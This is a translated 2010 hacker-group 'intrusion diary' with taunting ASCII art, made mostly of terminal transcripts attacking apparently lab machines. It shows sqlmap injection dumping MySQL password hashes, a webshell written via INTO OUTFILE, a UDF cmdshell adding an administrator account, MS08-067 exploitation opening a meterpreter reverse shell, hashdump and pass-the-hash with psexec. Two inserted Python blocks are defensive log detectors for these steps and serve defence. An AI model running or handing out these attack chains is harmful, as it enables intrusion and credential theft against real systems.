-----------------------------------------------------------------------------
Caonima's Intrusion Diary - helen's whole family are hackers! (I'm just a programmer, BY helen)
-----------------------------------------------------------------------------
I urge you not to cherish the gold-threaded robe; I urge you to cherish your youthful days.
When the flowers are fit for picking, pick them at once; do not wait until none remain and you pick an empty branch.
┏┓ ┏┓
┏━━┛┻━━━┛┻━━┓
┃ 王 ┃
┃ ━ ┃
┃ ┳━┛ ┗━┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━━┓ ┏━━┛
┃ ┃
┃ ┃
┃ ┗━━━━━┓
┃ ┣┓
┃ ┏┛
┗━┓┓┏━━━┳┓┏━┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛ // Author: Caonima, one of the Four Divine Beasts of Zone 9 (Dis9 Team) (・´ェ`・) 2010, light rain
-----------------------------------------------------------------------------------
///////////////////////////////////
0x1 Sitting alone in the quiet bamboo grove
///////////////////////////////////
[scan start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# nmap -sV -PN www.fuck-helen.com
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-15 23:32 EDT
Nmap scan report for www.fuck-helen.com (220.214.21.235)
Host is up (0.00082s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.63 ((Win32) PHP/5.2.14)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@bt:~# perl scan.pl
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Admin
xxx
website:www.hkmjj.com
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Enter the website you want to scan
e.g.: www.hkmjj.com or www.hkmjj.com/admin
--> www.fuck-helen.com
Enter the coding language of the website
e.g.: asp, php, cfm, any
--> php
->The website: http://www.fuck-helen.com/
->Source of the website: php
->Scan of the admin control panel is progressing...
[-] Not Found <- http://www.fuck-helen.com/_admin/
[-] Not Found <- http://www.fuck-helen.com/backoffice/
[+] Found -> http://www.fuck-helen.com/phpinfo.php
Congratulation, this admin login page is working.
[scan end ]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[phpinfo start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# http://www.fuck-helen.com/phpinfo.php
root@bt:~# cat phpinfo.php | grep SCRIPT_FILENAME
SCRIPT_FILENAME
C:/w/htdocs/phpinfo.php
_SERVER["SCRIPT_FILENAME"]
C:/w/htdocs/phpinfo.php
[phpinfo end]
[sqlmap start]
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.fuck-helen.com/index.php?id=1"
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 23:51:32
[23:51:32] [INFO] using '/pentest/database/sqlmap/output/www.fuck-helen.com/session' as session file
[23:51:32] [INFO] testing connection to the target url
[23:51:32] [INFO] testing if the url is stable, wait a few seconds
[23:51:33] [INFO] url is stable
[23:51:33] [INFO] testing if GET parameter 'id' is dynamic
[23:51:33] [INFO] confirming that GET parameter 'id' is dynamic
[23:51:33] [INFO] GET parameter 'id' is dynamic
[23:51:33] [INFO] (error based) heuristics shows that GET parameter 'id' is injectable (possible DBMS: MySQL)
[23:51:33] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[23:51:33] [INFO] testing unescaped numeric (AND) injection on GET parameter 'id'
[23:51:33] [INFO] confirming unescaped numeric (AND) injection on GET parameter 'id'
[23:51:33] [INFO] GET parameter 'id' is unescaped numeric (AND) injectable with 0 parenthesis
[23:51:33] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[23:51:33] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[23:51:33] [INFO] testing for parenthesis on injectable parameter
[23:51:34] [INFO] the injectable parameter requires 0 parenthesis
[23:51:34] [INFO] testing MySQL
[23:51:34] [INFO] confirming MySQL
[23:51:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.fuck-helen.com/index.php?id=1" --passwords
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 00:00:38
[00:00:39] [INFO] using '/pentest/database/sqlmap/output/www.fuck-helen.com/session' as session file
[00:00:39] [INFO] resuming injection point 'GET' from session file
[00:00:39] [INFO] resuming injection parameter 'id' from session file
[00:00:39] [INFO] resuming injection type 'numeric' from session file
[00:00:39] [INFO] resuming match ratio '0.941' from session file
[00:00:39] [INFO] resuming 0 number of parenthesis from session file
[00:00:39] [INFO] resuming back-end DBMS 'mysql 5' from session file
[00:00:39] [INFO] testing connection to the target url
[00:00:39] [INFO] testing for parenthesis on injectable parameter
[00:00:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5
[00:00:39] [INFO] fetching database users password hashes
[00:00:39] [INFO] fetching database users
[00:00:39] [INFO] fetching number of database users
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 3
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'root'@'localhost'
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'woaicangjingkong'@'localhost'
[00:00:39] [INFO] read from file '/pentest/database/sqlmap/output/www.fuck-helen.com/session': 'cangjingkong'@'localhost'
[00:00:39] [INFO] fetching number of password hashes for user 'root'
[00:00:39] [INFO] retrieved: 1
[00:00:39] [INFO] fetching password hashes for user 'root'
[00:00:39] [INFO] retrieved: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[00:00:46] [INFO] fetching number of password hashes for user 'woaicangjingkong'
[00:00:46] [INFO] retrieved: 1
[00:00:46] [INFO] fetching password hashes for user 'woaicangjingkong'
[00:00:46] [INFO] retrieved: *D2344FAF775433E007EB99FBFAF7DDE258A3AEBB
[00:00:58] [INFO] fetching number of password hashes for user 'cangjingkong'
[00:00:58] [INFO] retrieved: 1
[00:00:58] [INFO] fetching password hashes for user 'cangjingkong'
[00:00:58] [INFO] retrieved: *093E39878BBF4673AB70C14EEB4A86EE899E12E2
database management system users password hashes:
[*] cangjingkong [1]:
password hash: *093E39878BBF4673AB70C14EEB4A86EE899E12E2
[*] root [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] woaicangjingkong [1]:
password hash: *D2344FAF775433E007EB99FBFAF7DDE258A3AEBB
[00:01:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.fuck-helen.com'
[*] shutting down at: 00:01:10
[sqlmap end]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[mysql get shell start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
================================================================
mysql hash ==> md5.org
===============
password hash: *093E39878BBF4673AB70C14EEB4A86EE899E12E2=sbishelen
================
root@bt:~# mysql -u root -h www.fuck-helen.com -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1810
Server version: 5.0.90-community-nt MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| cangjingkong |
| mysql |
| phpzr |
| root |
| test |
| woaicangjingkong |
+--------------------+
7 rows in set (0.00 sec)
mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL);
Query OK, 0 rows affected (0.07 sec)
mysql> INSERT INTO GETSHELL VALUES ('
');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM GETSHELL into outfile 'C:/w/htdocs/sbishelen.php';
[mysql get shell end]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
[mysql udf.dll get system] -----/fuckhelen/---helen is sb----/fuckhelen/XX/
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user helennimashiji 123456 /add');
select cmdshell('net localgroup administrators helennimashiji /add');
select cmdshell('c:\3389.exe');
drop function cmdshell;
[mysql udf.dll get system end] -----/fuckhelen/---helen is sb----/fuckhelen/XX/
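A defender's check, added here and not part of the original write-up: both MySQL steps above (SELECT ... INTO OUTFILE aimed at the DocumentRoot found via phpinfo, then CREATE FUNCTION ... SONAME to load a UDF) appear verbatim in MySQL's general query log, as does the remote root login that made them possible. The Python below scans constructed log lines for those three patterns; the log line format and the web-root list are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample of MySQL general query log lines (format assumed:
# "<date> <time> <thread id> <command> <argument>"), modelled on the
# statements in the write-up above. Not a real capture.
SAMPLE_LOG = """\
100716  0:05:01    1810 Connect     root@203.0.113.9 on
100716  0:05:02    1810 Query       show databases
100716  0:05:10    1810 Query       CREATE TABLE GETSHELL (GETSHELL TEXT NOT NULL)
100716  0:05:20    1810 Query       SELECT * FROM GETSHELL into outfile 'C:/w/htdocs/sbishelen.php'
100716  0:06:00    1810 Query       create function cmdshell returns string soname 'udf.dll'
100716  0:06:30    1811 Query       SELECT name FROM products WHERE id = 1
100716  0:07:00    1811 Query       SELECT * FROM report INTO OUTFILE '/var/lib/mysql-files/report.csv'
"""

# Directories where a file write becomes code execution; assumed for this lab
# (C:/w/htdocs is the DocumentRoot the write-up read out of phpinfo.php).
WEB_ROOTS = ("c:/w/htdocs", "/var/www")
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp")

OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+'([^']+)'", re.I)
UDF_RE = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
REMOTE_ROOT_RE = re.compile(r"Connect\s+root@(?!localhost\b)(\S+)", re.I)

@dataclass
class Alert:
    line_no: int
    kind: str
    detail: str

def scan_general_log(text: str) -> list[Alert]:
    """Flag INTO OUTFILE writes that land in a web root as a script file,
    CREATE FUNCTION ... SONAME (UDF loading), and root logins from anywhere
    but localhost. Legitimate OUTFILE exports elsewhere are left alone."""
    alerts = []
    for n, line in enumerate(text.splitlines(), 1):
        m = OUTFILE_RE.search(line)
        if m:
            path = m.group(1).replace("\\", "/").lower()
            if path.startswith(WEB_ROOTS) and path.endswith(SCRIPT_EXT):
                alerts.append(Alert(n, "webshell-write", m.group(1)))
        m = UDF_RE.search(line)
        if m:
            alerts.append(Alert(n, "udf-load", f"{m.group(1)} <- {m.group(2)}"))
        m = REMOTE_ROOT_RE.search(line)
        if m:
            alerts.append(Alert(n, "remote-root-login", m.group(1)))
    return alerts

if __name__ == "__main__":
    for a in scan_general_log(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.kind}: {a.detail}")
```

The same three events are what a secure_file_priv setting, a root account restricted to localhost and a 3306 port that is not reachable from the outside prevent in the first place.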
============================
login fuck-helen.com 3389
reverse proxy . my pc . continue to fuck helen..
I'm just a programmer... by helen .
=============================
///////////////////////////////////
0x2 Cherish your youthful days
///////////////////////////////////
Continue to FUCK HELEN .....
[info start]-----/fuckhelen/---helen is sb----/fuckhelen/XX/
root@bt:~# nmap -v -sn 192.168.56.0-254
Scanning 152 hosts [1 port/host]
Completed ARP Ping Scan at 00:58, 1.62s elapsed (152 total hosts)
Initiating Parallel DNS resolution of 152 hosts. at 00:58
Completed Parallel DNS resolution of 152 hosts. at 00:59, 13.00s elapsed
Nmap scan report for 192.168.56.101
Nmap scan report for 192.168.56.104
Nmap scan report for 192.168.56.106
[info end]-----/fuckhelen/---helen is sb----/fuckhelen/X
////////////////////////////////////////////////////////////
/
/f0ck 192.168.56.106 start
(・´ェ`・)
|
| |
|---------
| |
|---------
| |
Your whole family are hackers
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
root@bt:~# nmap -v A 192.168.56.106
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-16 01:07 EDT
Failed to resolve given hostname/IP: A. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges
Initiating ARP Ping Scan at 01:07
Scanning 192.168.56.106 [1 port]
Completed ARP Ping Scan at 01:07, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:07
Completed Parallel DNS resolution of 1 host. at 01:07, 13.00s elapsed
Initiating SYN Stealth Scan at 01:07
Scanning 192.168.56.106 [1000 ports]
Discovered open port 80/tcp on 192.168.56.106
Discovered open port 135/tcp on 192.168.56.106
Discovered open port 445/tcp on 192.168.56.106
Discovered open port 139/tcp on 192.168.56.106
Discovered open port 3306/tcp on 192.168.56.106
Completed SYN Stealth Scan at 01:07, 0.34s elapsed (1000 total ports)
Nmap scan report for 192.168.56.106
Host is up (0.0046s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1002 (40.124KB)
--------------------------------------------------------------------------
[list users]
root@bt:/usr/share/nmap/scripts# nmap --script=smb-enum-users 192.168.56.106
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-16 01:20 EDT
Nmap scan report for 192.168.56.106
Host is up (0.0011s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:B2:CD:BD (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
| DIS9TEAM-7A9CFB\Administrator (RID: 500)
| DIS9TEAM-7A9CFB\dis9team (RID: 1003)
| DIS9TEAM-7A9CFB\Guest (RID: 501)
| DIS9TEAM-7A9CFB\helen (RID: 1004)
| DIS9TEAM-7A9CFB\HelpAssistant (RID: 1000)
|_ DIS9TEAM-7A9CFB\SUPPORT_388945a0 (RID: 1002)
Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds
[list users end ]
///// look : DIS9TEAM-7A9CFB\helen (RID: 1004)
[start metasploit]
root@bt:~# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11089 updated 236 days ago (2010.11.22)
Warning: This copy of the Metasploit Framework was last updated 236 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
RHOST => 192.168.56.106
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.106 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:56:5b:d4
inet addr:192.168.56.102 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe56:5bd4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:201015 errors:33 dropped:0 overruns:0 frame:0
TX packets:208250 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26801873 (26.8 MB) TX bytes:28666911 (28.6 MB)
Interrupt:10 Base address:0xd020
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4303 errors:0 dropped:0 overruns:0 frame:0
TX packets:4303 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:202067 (202.0 KB) TX bytes:202067 (202.0 KB)
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > set TARGET 15
TARGET => 15
msf exploit(ms08_067_netapi) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.102 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
15 Windows XP SP2 Chinese - Simplified (NX)
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
RHOST => 192.168.56.106
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.106
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.106:1045) at Sat Jul 16 01:47:51 -0400 2010
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helen:1004:d7959a227e45d740aad3b435b51404ee:8592e1331718673b0ee32df3c0153456:::
HelpAssistant:1000:80bc20a07acda04492cb562c07e825d3:dc07f108fcfe7eb5bcddb010d581cdb0:::
SUPPORT_388945a0q:1002:aad3b435b51404eeaad3b435b51404ee:583313911d6bb8dd0fbb89144a9f96e9:::
meterpreter >
[metasploit end ]
/////////////////////f0ck 192.168.56.106 end ////////////////////////
////////////////////////////////////////////////////////////
/
/f0ck 192.168.56.101 start
/..┏┓ ┏┓
/┏┛┻━━━┛┻┓
/┃ ┃
/┃ ━ ┃
/┃ ┳┛ ┗┳ ┃
/┃ ┃
/┃ ┻ ┃
/┃ ┃
/┗━┓ ┏━┛
/ ┃ ┃
/ ┃ ┃
/ ┃ ┗━━━┓
/ ┃ ┣┓
/ ┃ ┏┛
/ ┗┓┓┏━┳┓┏┛
/ ┃┫┫ ┃┫┫ On the vast and beautiful Mahler Gobi lives a herd of tenacious grass mud horses.
/ ┗┻┛ ┗┻┛
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
[info 192.168.56.106]
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.102:4444
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.106
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.106:1045) at Sat Jul 16 01:47:51 -0400 2010
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
dis9team:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helen:1004:d7959a227e45d740aad3b435b51404ee:8592e1331718673b0ee32df3c0153456:::
HelpAssistant:1000:80bc20a07acda04492cb562c07e825d3:dc07f108fcfe7eb5bcddb010d581cdb0:::
SUPPORT_388945a0q:1002:aad3b435b51404eeaad3b435b51404ee:583313911d6bb8dd0fbb89144a9f96e9:::
meterpreter >
[end info]
[hash fuck]
msf exploit(psexec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LPORT 4444 yes The listen port
RHOST 192.168.56.101 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > exploit
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Uploading payload
[*] Created wRAGxeKp.exe
[*] Obtaining a service manager handle
[*] Creating a new service (bbULKlnn - "Mn0aWrz")
[*] Closing service handle
[*] Opening service
[*] Starting the service
[*] Removing the servic.....
.. more......
meterpreter >
[end hash]
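Added defender's example, not from the original post: the two artefacts this pass-the-hash step leaves on 192.168.56.101 are a network (type 3) NTLM logon as the built-in Administrator and a service install (event 7045) with a random 8-letter name whose image is a random 8-letter .exe under ADMIN$, exactly the names visible in the psexec output above. The Python below checks constructed event records for both; the flat "id|k=v" record layout is an assumption.

```python
import re
from dataclasses import dataclass

# Constructed Windows event records, one per line as "<EventID>|k=v;k=v" (this
# flat rendering is an assumption for the example, not a real log export).
# Values mirror the psexec transcript above: a randomly named 8-letter .exe is
# uploaded to ADMIN$ and a randomly named 8-letter service is installed to
# run it, after an NTLM network logon made with the passed hash.
SAMPLE_EVENTS = """\
4624|Account=Administrator;LogonType=3;AuthPackage=NTLM;SrcIp=192.168.56.102
7045|ServiceName=bbULKlnn;ImagePath=\\\\127.0.0.1\\ADMIN$\\wRAGxeKp.exe;Account=LocalSystem
7045|ServiceName=Spooler;ImagePath=C:\\Windows\\System32\\spoolsv.exe;Account=LocalSystem
4624|Account=helen;LogonType=2;AuthPackage=Negotiate;SrcIp=127.0.0.1
"""

RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")            # service name shape seen above
RANDOM_EXE = re.compile(r"\\([A-Za-z]{8})\.exe$", re.I)  # uploaded binary shape seen above

@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str

def parse_event(line: str) -> tuple[int, dict]:
    """Split "<EventID>|k=v;k=v" into (event id, field dict)."""
    eid, _, rest = line.partition("|")
    fields = dict(kv.split("=", 1) for kv in rest.split(";") if "=" in kv)
    return int(eid), fields

def check_event(eid: int, f: dict) -> list[Finding]:
    """Rule 1: 7045 with a random 8-letter service name and an image that is
    either served from ADMIN$ or itself a random 8-letter .exe.
    Rule 2: 4624 network logon (type 3) over NTLM as the built-in Administrator."""
    out = []
    if eid == 7045:
        name, image = f.get("ServiceName", ""), f.get("ImagePath", "")
        if RANDOM_NAME.match(name) and ("ADMIN$" in image.upper() or RANDOM_EXE.search(image)):
            out.append(Finding(eid, "psexec-style-service", f"{name} -> {image}"))
    elif eid == 4624:
        if (f.get("LogonType") == "3" and f.get("AuthPackage") == "NTLM"
                and f.get("Account") == "Administrator"):
            out.append(Finding(eid, "ntlm-network-admin-logon", f.get("SrcIp", "?")))
    return out

def scan_events(text: str) -> list[Finding]:
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(check_event(*parse_event(line)))
    return findings

if __name__ == "__main__":
    for fnd in scan_events(SAMPLE_EVENTS):
        print(f"event {fnd.event_id}: {fnd.rule}: {fnd.detail}")
```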